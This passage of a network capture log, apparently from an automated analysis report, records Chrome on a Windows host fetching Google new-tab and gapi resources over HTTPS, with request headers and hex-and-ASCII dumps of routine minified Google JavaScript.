class\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l22
2024-11-07 03:12:07 UTC	1378	IN	Data Raw: 32 2c 32 7a 4d 36 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 32 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 Data Ascii: 2,2zM6,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM12,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1
2024-11-07 03:12:07 UTC	1378	IN	Data Raw: 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 31 22 2c 22 6c 65 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 2d 6c 61 62 65 6c 32 22 5d 2c 22 6d 65 6e 75 5f 70 6c 61 63 65 68 6f 6c 64 65 72 5f 6c 61 62 65 6c 22 3a 22 6d 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 33 34 30 2c 33 37 30 31 33 38 34 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 Data Ascii: ft_product_control-label1","left_product_control-label2"],"menu_placeholder_label":"menu-content","metadata":{"bar_height":60,"experiment_id":[3700340,3701384],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_sc
2024-11-07 03:12:07 UTC	1378	IN	Data Raw: 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2b 5c 22 3a 5c 22 29 7d 3b 5f 2e 52 64 5c 75 30 30 33 64 67 6c 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b 5f 2e 53 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 69 5c 75 30 30 33 64 61 7d 74 6f 53 74 72 69 6e 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 7d 7d 3b 5f 2e 54 64 5c 75 30 30 33 64 6e 65 77 20 5f 2e 53 64 28 5c 22 61 62 6f 75 74 3a 69 6e 76 61 6c 69 64 23 7a 43 6c 6f 73 75 72 65 7a 5c 22 29 3b 5f 2e 50 64 5c 75 30 30 33 64 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 6a 68 5c 75 30 30 33 64 61 7d 7d 3b 5f 2e 55 64 5c 75 30 30 33 64 5b 51 64 28 5c 22 64 Data Ascii: erCase()\u003d\u003d\u003da+\":\")};_.Rd\u003dglobalThis.trustedTypes;_.Sd\u003dclass{constructor(a){this.i\u003da}toString(){return this.i}};_.Td\u003dnew _.Sd(\"about:invalid#zClosurez\");_.Pd\u003dclass{constructor(a){this.jh\u003da}};_.Ud\u003d[Qd(\"d
2024-11-07 03:12:07 UTC	913	IN	Data Raw: 2e 69 3b 65 6c 73 65 20 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 46 5c 22 29 3b 65 6c 73 65 20 61 5c 75 30 30 33 64 5f 2e 67 65 28 61 29 3b 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 69 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 29 7b 6c 65 74 20 63 2c 64 3b 62 5c 75 30 30 33 64 28 64 5c 75 30 30 33 64 28 63 5c 75 30 30 33 64 5c 22 64 6f 63 75 6d 65 6e 74 5c 22 69 6e 20 62 3f 62 2e 64 6f 63 75 6d 65 6e 74 3a 62 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 29 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 64 2e 63 61 6c 6c 28 63 2c 60 24 7b 61 7d 5b 6e 6f 6e 63 65 5d 60 29 3b 72 65 74 75 72 6e 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 5c 22 5c 22 3a 62 2e 6e 6f 6e 63 Data Ascii: .i;else throw Error(\"F\");else a\u003d_.ge(a);return a};_.ie\u003dfunction(a,b\u003ddocument){let c,d;b\u003d(d\u003d(c\u003d\"document\"in b?b.document:b).querySelector)\u003d\u003dnull?void 0:d.call(c,`${a}[nonce]`);return b\u003d\u003dnull?\"\":b.nonc
2024-11-07 03:12:07 UTC	364	IN	Data Raw: 31 36 35 0d 0a 5d 2b 3a 7c 5b 5e 3a 2f 3f 23 5d 2a 28 3f 3a 5b 2f 3f 23 5d 7c 24 29 29 2f 69 3b 76 61 72 20 74 65 2c 78 65 2c 70 65 3b 5f 2e 72 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 6e 65 77 20 70 65 28 5f 2e 71 65 28 61 29 29 3a 6e 65 7c 7c 28 6e 65 5c 75 30 30 33 64 6e 65 77 20 70 65 29 7d 3b 5f 2e 73 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 72 69 6e 67 5c 22 3f 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 62 29 3a 62 7d 3b 5f 2e 55 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 5c 75 30 30 33 64 62 7c 7c 64 6f 63 75 6d 65 6e 74 3b 63 2e 67 65 Data Ascii: 165]+:\|[^:/?#]*(?:[/?#]\|$))/i;var te,xe,pe;_.re\u003dfunction(a){return a?new pe(_.qe(a)):ne\|\|(ne\u003dnew pe)};_.se\u003dfunction(a,b){return typeof b\u003d\u003d\u003d\"string\"?a.getElementById(b):b};_.U\u003dfunction(a,b){var c\u003db\|\|document;c.ge
2024-11-07 03:12:07 UTC	1378	IN	Data Raw: 38 30 30 30 0d 0a 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 28 62 5c 75 30 30 33 64 62 7c 7c 63 2c 61 5c 75 30 30 33 64 28 61 3f 62 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 61 3f 5c 22 2e 5c 22 2b 61 3a 5c 22 5c 22 29 3a 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 5c 22 2a 5c 22 29 29 5b 30 5d 7c 7c 6e 75 6c 6c 29 29 3b 72 65 74 75 72 6e 20 61 7c 7c 6e 75 6c 6c 7d 3b 5c 6e 5f 2e 75 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 5f 2e 47 62 28 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 29 7b 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 79 6c 65 5c 22 3f 61 2e 73 74 79 6c 65 2e 63 73 73 54 65 78 74 5c 75 30 30 33 64 63 3a 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 63 6c 61 73 73 5c 22 3f 61 2e Data Ascii: 8000?\".\"+a:\"\"):(b\u003db\|\|c,a\u003d(a?b.querySelectorAll(a?\".\"+a:\"\"):b.getElementsByTagName(\"*\"))[0]\|\|null));return a\|\|null};\n_.ue\u003dfunction(a,b){_.Gb(b,function(c,d){d\u003d\u003d\"style\"?a.style.cssText\u003dc:d\u003d\u003d\"class\"?a.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49736	172.217.16.196	443	7268	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:12:06 UTC	353	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-07 03:12:07 UTC	957	IN	HTTP/1.1 200 OK Version: 691307345 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Thu, 07 Nov 2024 03:12:07 GMT Server: gws Cache-Control: private X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-11-07 03:12:07 UTC	35	IN	Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a Data Ascii: 1d)]}'{"update":{"promos":{}}}
2024-11-07 03:12:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49745	216.58.206.46	443	7268	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:12:10 UTC	741	OUT	GET /_/scs/abc-static/_/js/k=gapi.gapi.en.SGzW6IeCawI.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AACA/rs=AHpOoo-5biO9jua-6zCEovdoDJ8SLzd6sw/cb=gapi.loaded_0 HTTP/1.1 Host: apis.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-07 03:12:10 UTC	916	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Access-Control-Allow-Origin: * Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/social-frontend-mpm-access Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="social-frontend-mpm-access" Report-To: {"group":"social-frontend-mpm-access","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/social-frontend-mpm-access"}]} Content-Length: 117949 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Mon, 04 Nov 2024 00:14:04 GMT Expires: Tue, 04 Nov 2025 00:14:04 GMT Cache-Control: public, max-age=31536000 Last-Modified: Thu, 10 Oct 2024 19:55:27 GMT Content-Type: text/javascript; charset=UTF-8 Vary: Accept-Encoding Age: 269886 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-11-07 03:12:10 UTC	462	IN	Data Raw: 67 61 70 69 2e 6c 6f 61 64 65 64 5f 30 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 74 79 70 65 6f 66 20 73 65 6c 66 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 73 65 6c 66 3a 74 68 69 73 29 2e 5f 46 5f 74 6f 67 67 6c 65 73 3d 61 7c 7c 5b 5d 7d 3b 28 30 2c 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 29 28 5b 30 78 38 30 30 30 30 30 2c 20 5d 29 3b 0a 76 61 72 20 64 61 2c 65 61 2c 68 61 2c 6e 61 2c 6f 61 2c 73 61 2c 74 61 2c 77 61 3b 64 61 3d 66 75 6e Data Ascii: gapi.loaded_0(function(_){var window=this;_._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a\|\|[]};(0,_._F_toggles_initialize)([0x800000, ]);var da,ea,ha,na,oa,sa,ta,wa;da=fun
2024-11-07 03:12:10 UTC	1378	IN	Data Raw: 6f 74 6f 74 79 70 65 29 72 65 74 75 72 6e 20 61 3b 61 5b 62 5d 3d 63 2e 76 61 6c 75 65 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 68 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2c 61 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 5d 3b 66 6f 72 28 76 61 72 20 62 3d 30 3b 62 3c 61 2e 6c 65 6e 67 74 68 3b 2b 2b 62 29 7b 76 61 72 20 63 3d 61 5b 62 5d 3b 69 66 28 63 26 26 63 2e 4d 61 74 68 3d 3d 4d 61 74 68 29 72 65 74 Data Ascii: ototype)return a;a[b]=c.value;return a};ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)ret
2024-11-07 03:12:10 UTC	1378	IN	Data Raw: 76 61 72 20 62 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 26 26 61 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3b 69 66 28 62 29 72 65 74 75 72 6e 20 62 2e 63 61 6c 6c 28 61 29 3b 69 66 28 74 79 70 65 6f 66 20 61 2e 6c 65 6e 67 74 68 3d 3d 22 6e 75 6d 62 65 72 22 29 72 65 74 75 72 6e 7b 6e 65 78 74 3a 64 61 28 61 29 7d 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 22 62 60 22 2b 53 74 72 69 6e 67 28 61 29 29 3b 7d 3b 73 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 61 2c 62 29 7d 3b 74 61 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 61 Data Ascii: var b=typeof Symbol!="undefined"&&Symbol.iterator&&a[Symbol.iterator];if(b)return b.call(a);if(typeof a.length=="number")return{next:da(a)};throw Error("b`"+String(a));};sa=function(a,b){return Object.prototype.hasOwnProperty.call(a,b)};ta=typeof Object.a
2024-11-07 03:12:10 UTC	1378	IN	Data Raw: 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 74 68 69 73 2e 46 61 3d 30 3b 74 68 69 73 2e 77 66 3d 76 6f 69 64 20 30 3b 74 68 69 73 2e 4e 72 3d 5b 5d 3b 74 68 69 73 2e 68 56 3d 21 31 3b 76 61 72 20 6b 3d 74 68 69 73 2e 6a 46 28 29 3b 74 72 79 7b 68 28 6b 2e 72 65 73 6f 6c 76 65 2c 6b 2e 72 65 6a 65 63 74 29 7d 63 61 74 63 68 28 6c 29 7b 6b 2e 72 65 6a 65 63 74 28 6c 29 7d 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 6a 46 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 68 28 6d 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 6c 7c 7c 28 6c 3d 21 30 2c 6d 2e 63 61 6c 6c 28 6b 2c 6e 29 29 7d 7d 76 61 72 20 6b 3d 74 68 69 73 2c 6c 3d 21 31 3b 72 65 74 75 72 6e 7b 72 65 73 6f 6c 76 65 3a 68 28 74 68 69 73 2e 53 64 61 29 2c 72 65 6a 65 63 Data Ascii: =function(h){this.Fa=0;this.wf=void 0;this.Nr=[];this.hV=!1;var k=this.jF();try{h(k.resolve,k.reject)}catch(l){k.reject(l)}};e.prototype.jF=function(){function h(m){return function(n){l\|\|(l=!0,m.call(k,n))}}var k=this,l=!1;return{resolve:h(this.Sda),rejec
2024-11-07 03:12:10 UTC	1378	IN	Data Raw: 2e 70 72 6f 6d 69 73 65 3d 74 68 69 73 3b 68 2e 72 65 61 73 6f 6e 3d 74 68 69 73 2e 77 66 3b 72 65 74 75 72 6e 20 6c 28 68 29 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 47 37 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 68 69 73 2e 4e 72 21 3d 6e 75 6c 6c 29 7b 66 6f 72 28 76 61 72 20 68 3d 30 3b 68 3c 74 68 69 73 2e 4e 72 2e 6c 65 6e 67 74 68 3b 2b 2b 68 29 66 2e 58 4f 28 74 68 69 73 2e 4e 72 5b 68 5d 29 3b 0a 74 68 69 73 2e 4e 72 3d 6e 75 6c 6c 7d 7d 3b 76 61 72 20 66 3d 6e 65 77 20 62 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 79 66 61 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 76 61 72 20 6b 3d 74 68 69 73 2e 6a 46 28 29 3b 68 2e 69 79 28 6b 2e 72 65 73 6f 6c 76 65 2c 6b 2e 72 65 6a 65 63 74 29 7d 3b 65 2e 70 72 6f 74 6f 74 79 70 65 2e 7a 66 61 3d 66 75 6e Data Ascii: .promise=this;h.reason=this.wf;return l(h)};e.prototype.G7=function(){if(this.Nr!=null){for(var h=0;h<this.Nr.length;++h)f.XO(this.Nr[h]);this.Nr=null}};var f=new b;e.prototype.yfa=function(h){var k=this.jF();h.iy(k.resolve,k.reject)};e.prototype.zfa=fun
2024-11-07 03:12:10 UTC	1378	IN	Data Raw: 72 6f 72 28 22 46 69 72 73 74 20 61 72 67 75 6d 65 6e 74 20 74 6f 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 22 2b 63 2b 22 20 6d 75 73 74 20 6e 6f 74 20 62 65 20 61 20 72 65 67 75 6c 61 72 20 65 78 70 72 65 73 73 69 6f 6e 22 29 3b 72 65 74 75 72 6e 20 61 2b 22 22 7d 3b 0a 6e 61 28 22 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 73 74 61 72 74 73 57 69 74 68 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 76 61 72 20 64 3d 45 61 28 74 68 69 73 2c 62 2c 22 73 74 61 72 74 73 57 69 74 68 22 29 2c 65 3d 64 2e 6c 65 6e 67 74 68 2c 66 3d 62 2e 6c 65 6e 67 74 68 3b 63 3d 4d 61 74 68 2e 6d 61 78 28 30 2c 4d 61 74 68 2e 6d 69 6e 28 63 7c 30 2c 64 2e 6c 65 6e 67 74 68 29 29 3b 66 Data Ascii: ror("First argument to String.prototype."+c+" must not be a regular expression");return a+""};na("String.prototype.startsWith",function(a){return a?a:function(b,c){var d=Ea(this,b,"startsWith"),e=d.length,f=b.length;c=Math.max(0,Math.min(c\|0,d.length));f
2024-11-07 03:12:10 UTC	1378	IN	Data Raw: 61 72 20 68 3d 30 2c 6b 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 74 68 69 73 2e 47 61 3d 28 68 2b 3d 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2b 31 29 2e 74 6f 53 74 72 69 6e 67 28 29 3b 69 66 28 6c 29 7b 6c 3d 5f 2e 72 61 28 6c 29 3b 66 6f 72 28 76 61 72 20 6d 3b 21 28 6d 3d 6c 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 6d 3d 6d 2e 76 61 6c 75 65 2c 74 68 69 73 2e 73 65 74 28 6d 5b 30 5d 2c 6d 5b 31 5d 29 7d 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 69 66 28 21 63 28 6c 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 65 22 29 3b 64 28 6c 29 3b 69 66 28 21 73 61 28 6c 2c 66 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 66 60 22 2b 6c 29 3b 6c 5b 66 5d 5b 74 68 69 73 2e 47 61 5d 3d 6d 3b 72 65 74 75 72 6e 20 Data Ascii: ar h=0,k=function(l){this.Ga=(h+=Math.random()+1).toString();if(l){l=_.ra(l);for(var m;!(m=l.next()).done;)m=m.value,this.set(m[0],m[1])}};k.prototype.set=function(l,m){if(!c(l))throw Error("e");d(l);if(!sa(l,f))throw Error("f`"+l);l[f][this.Ga]=m;return
2024-11-07 03:12:10 UTC	1378	IN	Data Raw: 74 65 3d 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 6b 3d 64 28 74 68 69 73 2c 6b 29 3b 72 65 74 75 72 6e 20 6b 2e 5a 65 26 26 6b 2e 6c 69 73 74 3f 28 6b 2e 6c 69 73 74 2e 73 70 6c 69 63 65 28 6b 2e 69 6e 64 65 78 2c 31 29 2c 6b 2e 6c 69 73 74 2e 6c 65 6e 67 74 68 7c 7c 64 65 6c 65 74 65 20 74 68 69 73 5b 30 5d 5b 6b 2e 69 64 5d 2c 6b 2e 5a 65 2e 52 6b 2e 6e 65 78 74 3d 6b 2e 5a 65 2e 6e 65 78 74 2c 6b 2e 5a 65 2e 6e 65 78 74 2e 52 6b 3d 0a 6b 2e 5a 65 2e 52 6b 2c 6b 2e 5a 65 2e 68 65 61 64 3d 6e 75 6c 6c 2c 74 68 69 73 2e 73 69 7a 65 2d 2d 2c 21 30 29 3a 21 31 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6c 65 61 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 5b 30 5d 3d 7b 7d 3b 74 68 69 73 5b 31 5d 3d 74 68 69 73 5b 31 5d 2e 52 6b 3d 66 28 29 3b 74 68 69 Data Ascii: te=function(k){k=d(this,k);return k.Ze&&k.list?(k.list.splice(k.index,1),k.list.length\|\|delete this[0][k.id],k.Ze.Rk.next=k.Ze.next,k.Ze.next.Rk=k.Ze.Rk,k.Ze.head=null,this.size--,!0):!1};c.prototype.clear=function(){this[0]={};this[1]=this[1].Rk=f();thi
2024-11-07 03:12:10 UTC	1378	IN	Data Raw: 79 70 65 2e 65 6e 74 72 69 65 73 7c 7c 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 61 6c 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 76 61 72 20 63 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 78 3a 34 7d 29 2c 64 3d 6e 65 77 20 61 28 5f 2e 72 61 28 5b 63 5d 29 29 3b 69 66 28 21 64 2e 68 61 73 28 63 29 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 63 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 7b 78 3a 34 7d 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 32 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 65 3d 64 2e 65 6e 74 72 69 65 73 28 29 2c 66 3d 65 2e 6e 65 78 74 28 29 3b 69 66 28 66 2e 64 6f 6e 65 7c 7c 66 2e 76 61 6c 75 65 5b 30 5d 21 3d 63 7c 7c 66 2e 76 61 6c 75 65 5b 31 5d 21 3d 63 29 Data Ascii: ype.entries\|\|typeof Object.seal!="function")return!1;try{var c=Object.seal({x:4}),d=new a(_.ra([c]));if(!d.has(c)\|\|d.size!=1\|\|d.add(c)!=d\|\|d.size!=1\|\|d.add({x:4})!=d\|\|d.size!=2)return!1;var e=d.entries(),f=e.next();if(f.done\|\|f.value[0]!=c\|\|f.value[1]!=c)
2024-11-07 03:12:10 UTC	1378	IN	Data Raw: 62 2b 39 32 31 36 7d 7d 7d 29 3b 0a 6e 61 28 22 53 74 72 69 6e 67 2e 66 72 6f 6d 43 6f 64 65 50 6f 69 6e 74 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 29 7b 66 6f 72 28 76 61 72 20 63 3d 22 22 2c 64 3d 30 3b 64 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 64 2b 2b 29 7b 76 61 72 20 65 3d 4e 75 6d 62 65 72 28 61 72 67 75 6d 65 6e 74 73 5b 64 5d 29 3b 69 66 28 65 3c 30 7c 7c 65 3e 31 31 31 34 31 31 31 7c 7c 65 21 3d 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 65 29 29 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 69 6e 76 61 6c 69 64 5f 63 6f 64 65 5f 70 6f 69 6e 74 20 22 2b 65 29 3b 65 3c 3d 36 35 35 33 35 3f 63 2b 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 Data Ascii: b+9216}}});na("String.fromCodePoint",function(a){return a?a:function(b){for(var c="",d=0;d<arguments.length;d++){var e=Number(arguments[d]);if(e<0\|\|e>1114111\|\|e!==Math.floor(e))throw new RangeError("invalid_code_point "+e);e<=65535?c+=String.fromCharCode

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49747	142.250.186.78	443	7268	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
